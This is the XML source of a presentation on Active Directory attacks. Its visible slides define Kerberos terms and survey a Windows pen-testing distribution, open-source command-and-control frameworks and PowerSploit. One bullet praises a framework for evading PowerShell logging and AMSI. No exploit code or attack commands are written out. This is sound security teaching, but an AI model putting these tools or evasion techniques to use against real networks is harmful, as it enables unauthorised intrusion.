          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Title Text</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bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="222222"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71"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72" name="Title Text"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Title Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="Body Level One…"/>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Alt">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81"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82" name="Title Text"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Title Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Body Level One…"/>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bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="222222"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91"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92" name="Image"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="pic" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6665377" y="1219200"/>
            <a:ext cx="7445457" cy="8216900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91439" tIns="45719" rIns="91439" bIns="45719">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93" name="Title Text"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="406400" y="1536700"/>
            <a:ext cx="6299200" cy="723900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Title Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94" name="Body Level One…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="406400" y="2743200"/>
            <a:ext cx="6299200" cy="6108700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buChar char="▸"/>
              <a:defRPr sz="2800"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buChar char="▸"/>
              <a:defRPr sz="2800"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buChar char="▸"/>
              <a:defRPr sz="2800"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buChar char="▸"/>
              <a:defRPr sz="2800"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buChar char="▸"/>
              <a:defRPr sz="2800"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Body Level One</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Body Level Two</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:t>Body Level Three</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:t>Body Level Four</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:t>Body Level Five</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Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="406400" y="993160"/>
            <a:ext cx="12192000" cy="263"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="254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3" name="Title Text"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="406400" y="1536700"/>
            <a:ext cx="12192000" cy="723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Title Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Body Level One…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="406400" y="2743200"/>
            <a:ext cx="12192000" cy="6108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12186622" y="431800"/>
            <a:ext cx="406897" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="50800" tIns="50800" rIns="50800" bIns="50800">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr sz="2400">
                <a:latin typeface="DIN Alternate"/>
                <a:ea typeface="DIN Alternate"/>
                <a:cs typeface="DIN Alternate"/>
                <a:sym typeface="DIN Alternate"/>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transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1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a:defRPr>
      </a:lvl1pPr>
      <a:lvl2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a:defRPr>
      </a:lvl2pPr>
      <a:lvl3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a:defRPr>
      </a:lvl3pPr>
      <a:lvl4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a:defRPr>
      </a:lvl4pPr>
      <a:lvl5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a:defRPr>
      </a:lvl5pPr>
      <a:lvl6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a:defRPr>
      </a:lvl6pPr>
      <a:lvl7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a:defRPr>
      </a:lvl7pPr>
      <a:lvl8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a:defRPr>
      </a:lvl8pPr>
      <a:lvl9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a:defRPr>
      </a:lvl9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="4445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solidFill>
            <a:srgbClr val="838787"/>
          </a:solidFill>
          <a:uFillTx/>
          <a:latin typeface="Avenir Next Medium"/>
          <a:ea typeface="Avenir Next Medium"/>
          <a:cs typeface="Avenir Next Medium"/>
          <a:sym typeface="Avenir Next Medium"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="8890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solidFill>
            <a:srgbClr val="838787"/>
          </a:solidFill>
          <a:uFillTx/>
          <a:latin typeface="Avenir Next Medium"/>
          <a:ea typeface="Avenir Next Medium"/>
          <a:cs typeface="Avenir Next Medium"/>
          <a:sym typeface="Avenir Next Medium"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="13335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solidFill>
            <a:srgbClr val="838787"/>
          </a:solidFill>
          <a:uFillTx/>
          <a:latin typeface="Avenir Next Medium"/>
          <a:ea typeface="Avenir Next Medium"/>
          <a:cs typeface="Avenir Next Medium"/>
          <a:sym typeface="Avenir Next Medium"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="17780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solidFill>
            <a:srgbClr val="838787"/>
          </a:solidFill>
          <a:uFillTx/>
          <a:latin typeface="Avenir Next Medium"/>
          <a:ea typeface="Avenir Next Medium"/>
          <a:cs typeface="Avenir Next Medium"/>
          <a:sym typeface="Avenir Next Medium"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="22225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solidFill>
            <a:srgbClr val="838787"/>
          </a:solidFill>
          <a:uFillTx/>
          <a:latin typeface="Avenir Next Medium"/>
          <a:ea typeface="Avenir Next Medium"/>
          <a:cs typeface="Avenir Next Medium"/>
          <a:sym typeface="Avenir Next Medium"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="26670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solidFill>
            <a:srgbClr val="838787"/>
          </a:solidFill>
          <a:uFillTx/>
          <a:latin typeface="Avenir Next Medium"/>
          <a:ea typeface="Avenir Next Medium"/>
          <a:cs typeface="Avenir Next Medium"/>
          <a:sym typeface="Avenir Next Medium"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="31115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solidFill>
            <a:srgbClr val="838787"/>
          </a:solidFill>
          <a:uFillTx/>
          <a:latin typeface="Avenir Next Medium"/>
          <a:ea typeface="Avenir Next Medium"/>
          <a:cs typeface="Avenir Next Medium"/>
          <a:sym typeface="Avenir Next Medium"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="35560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solidFill>
            <a:srgbClr val="838787"/>
          </a:solidFill>
          <a:uFillTx/>
          <a:latin typeface="Avenir Next Medium"/>
          <a:ea typeface="Avenir Next Medium"/>
          <a:cs typeface="Avenir Next Medium"/>
          <a:sym typeface="Avenir Next Medium"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="40005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solidFill>
            <a:srgbClr val="838787"/>
          </a:solidFill>
          <a:uFillTx/>
          <a:latin typeface="Avenir Next Medium"/>
          <a:ea typeface="Avenir Next Medium"/>
          <a:cs typeface="Avenir Next Medium"/>
          <a:sym typeface="Avenir Next Medium"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:bodyStyle>
    <p:otherStyle>
      <a:lvl1pPr marL="0" marR="0" indent="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1pPr>
      <a:lvl2pPr marL="0" marR="0" indent="22860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2pPr>
      <a:lvl3pPr marL="0" marR="0" indent="45720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3pPr>
      <a:lvl4pPr marL="0" marR="0" indent="68580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4pPr>
      <a:lvl5pPr marL="0" marR="0" indent="91440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5pPr>
      <a:lvl6pPr marL="0" marR="0" indent="114300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6pPr>
      <a:lvl7pPr marL="0" marR="0" indent="137160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7pPr>
      <a:lvl8pPr marL="0" marR="0" indent="160020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8pPr>
      <a:lvl9pPr marL="0" marR="0" indent="182880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hyperlink" Target="https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://live.sysinternals.com" TargetMode="External"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide1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jpeg"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide17.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3.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hyperlink" Target="https://adsecurity.org/?page_id=183" TargetMode="External"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide1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hyperlink" Target="https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Find-PSServiceAccounts" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.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mailto:me@blaketownsend.com" TargetMode="External"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide20.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6.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3.jpeg"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide27.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8.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4.jpeg"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide2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5.jpeg"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide3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hyperlink" Target="https://github.com/byt3bl33d3r" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hausec.com/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.cptjesus.com/" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.harmj0y.net/" TargetMode="External"/></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1.jpeg"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide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Modern AD attacks"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="502412">
              <a:defRPr sz="14620"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Modern AD attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167" name="Blake Townsend"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="subTitle" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Blake Townsend </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Kerberos…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="364489" indent="-364489" defTabSz="479044">
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:defRPr sz="2788"/>
            </a:pPr>
            <a:r>
              <a:t>Kerberos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="728979" indent="-364489" defTabSz="479044">
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:defRPr sz="2788"/>
            </a:pPr>
            <a:r>
              <a:t>Ticket - A temporary set of electronic credentials that verify the identity of a client for a particular service. Also called credentials.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="728979" indent="-364489" defTabSz="479044">
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:defRPr sz="2788"/>
            </a:pPr>
            <a:r>
              <a:t>Ticket-granting Server (TGS) - A server that issues tickets for a desired service which are in turn given to users for access to the service. The TGS usually runs on the same host as the KDC.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="728979" indent="-364489" defTabSz="479044">
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:defRPr sz="2788"/>
            </a:pPr>
            <a:r>
              <a:t>Ticket-granting Ticket (TGT) - A special ticket that allows the client to obtain additional tickets without applying for them from the KDC.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="728979" indent="-364489" defTabSz="479044">
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:defRPr sz="2788"/>
            </a:pPr>
            <a:r>
              <a:t>Key Distribution Center (KDC) - A service that issues Kerberos tickets, usually run on the same host as the Ticket-granting Server (TGS).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="208" name="Get-credential"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="467359">
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:defRPr sz="4800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Get-credential</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07">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0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0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07">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07">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207">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07" grpId="1"/>
    </p:bldLst>
  </p:timing>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2" name="Get-command *pwnage*"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Get-command *pwnage*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xit" nodeType="clickEffect" presetSubtype="0" presetID="1" grpId="1" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="6" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="21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12" grpId="1"/>
    </p:bldLst>
  </p:timing>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Windows pen testing “Distribution”…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="426719" indent="-426719" defTabSz="560831">
              <a:spcBef>
                <a:spcPts val="2600"/>
              </a:spcBef>
              <a:defRPr sz="3264"/>
            </a:pPr>
            <a:r>
              <a:t>Windows pen testing “Distribution”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="853439" indent="-426719" defTabSz="560831">
              <a:spcBef>
                <a:spcPts val="2600"/>
              </a:spcBef>
              <a:defRPr sz="3264"/>
            </a:pPr>
            <a:r>
              <a:t>Really just scripts to install packages and configure settings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="853439" indent="-426719" defTabSz="560831">
              <a:spcBef>
                <a:spcPts val="2600"/>
              </a:spcBef>
              <a:defRPr sz="3264"/>
            </a:pPr>
            <a:r>
              <a:t>Relies heavily on chocolaty</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="853439" indent="-426719" defTabSz="560831">
              <a:spcBef>
                <a:spcPts val="2600"/>
              </a:spcBef>
              <a:defRPr sz="3264"/>
            </a:pPr>
            <a:r>
              <a:t>Developed by FireEye</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="853439" indent="-426719" defTabSz="560831">
              <a:spcBef>
                <a:spcPts val="2600"/>
              </a:spcBef>
              <a:defRPr sz="3264"/>
            </a:pPr>
            <a:r>
              <a:t>Easily configurable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="853439" indent="-426719" defTabSz="560831">
              <a:spcBef>
                <a:spcPts val="2600"/>
              </a:spcBef>
              <a:defRPr sz="3264"/>
            </a:pPr>
            <a:r>
              <a:t>Uses the WSL to provide a full kali disto with terminal as well as xrdp connection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="215" name="Get-Windows | where-object {$_platform -like kali}"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="467359">
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:defRPr sz="4800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Get-Windows | where-object {$_platform -like kali}</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14">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1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1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1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1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214">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214">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14" grpId="1"/>
    </p:bldLst>
  </p:timing>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9" name="SILENTTRINITY…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="240030" indent="-240030" defTabSz="315468">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:defRPr sz="1836"/>
            </a:pPr>
            <a:r>
              <a:t>SILENTTRINITY</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="480060" indent="-240030" defTabSz="315468">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:defRPr sz="1836"/>
            </a:pPr>
            <a:r>
              <a:t>Developed by @by3tbl33d3r</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="480060" indent="-240030" defTabSz="315468">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:defRPr sz="1836"/>
            </a:pPr>
            <a:r>
              <a:t>Python and boo lang - All the joys of powershell with out all those meddling logs and their pesky amsi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="240030" indent="-240030" defTabSz="315468">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:defRPr sz="1836"/>
            </a:pPr>
            <a:r>
              <a:t>Covenant </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="480060" indent="-240030" defTabSz="315468">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:defRPr sz="1836"/>
            </a:pPr>
            <a:r>
              <a:t>Written by @cobbr</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="480060" indent="-240030" defTabSz="315468">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:defRPr sz="1836"/>
            </a:pPr>
            <a:r>
              <a:t>Very handy web interface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="480060" indent="-240030" defTabSz="315468">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:defRPr sz="1836"/>
            </a:pPr>
            <a:r>
              <a:t>P2p</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="240030" indent="-240030" defTabSz="315468">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:defRPr sz="1836"/>
            </a:pPr>
            <a:r>
              <a:t>Merlin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="480060" indent="-240030" defTabSz="315468">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:defRPr sz="1836"/>
            </a:pPr>
            <a:r>
              <a:t>Written by @ne0nd0g in golang</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="480060" indent="-240030" defTabSz="315468">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:defRPr sz="1836"/>
            </a:pPr>
            <a:r>
              <a:t>Communicates over HTTP/2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="240030" indent="-240030" defTabSz="315468">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:defRPr sz="1836"/>
            </a:pPr>
            <a:r>
              <a:t>PoshC2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="480060" indent="-240030" defTabSz="315468">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:defRPr sz="1836"/>
            </a:pPr>
            <a:r>
              <a:t>PowershellC2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="220" name="get-C2 |  where-object {$_.opensource -eq $true}"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1" defTabSz="467359">
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t>get-C2 |  where-object {$_.opensource -eq $true}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19">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1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1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19">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19">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219">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219">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219">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219">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0" presetID="1" grpId="1" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="40" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="219">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Class="entr" nodeType="clickEffect" presetSubtype="0" presetID="1" grpId="1" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="44" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="219">
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>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Class="entr" nodeType="clickEffect" presetSubtype="0" presetID="1" grpId="1" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="48" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="219">
                                            <p:txEl>
                                              <p:pRg st="10" end="1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Class="entr" nodeType="clickEffect" presetSubtype="0" presetID="1" grpId="1" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="52" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="219">
                                            <p:txEl>
                                              <p:pRg st="11" end="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19" grpId="1"/>
    </p:bldLst>
  </p:timing>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4" name="PowerSploit…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="240030" indent="-240030" defTabSz="315468">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:defRPr sz="1836"/>
            </a:pPr>
            <a:r>
              <a:t>PowerSploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="480060" indent="-240030" defTabSz="315468">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:defRPr sz="1836"/>
            </a:pPr>
            <a:r>
              <a:t>Collection of powershell modules to help pentesters</a:t>
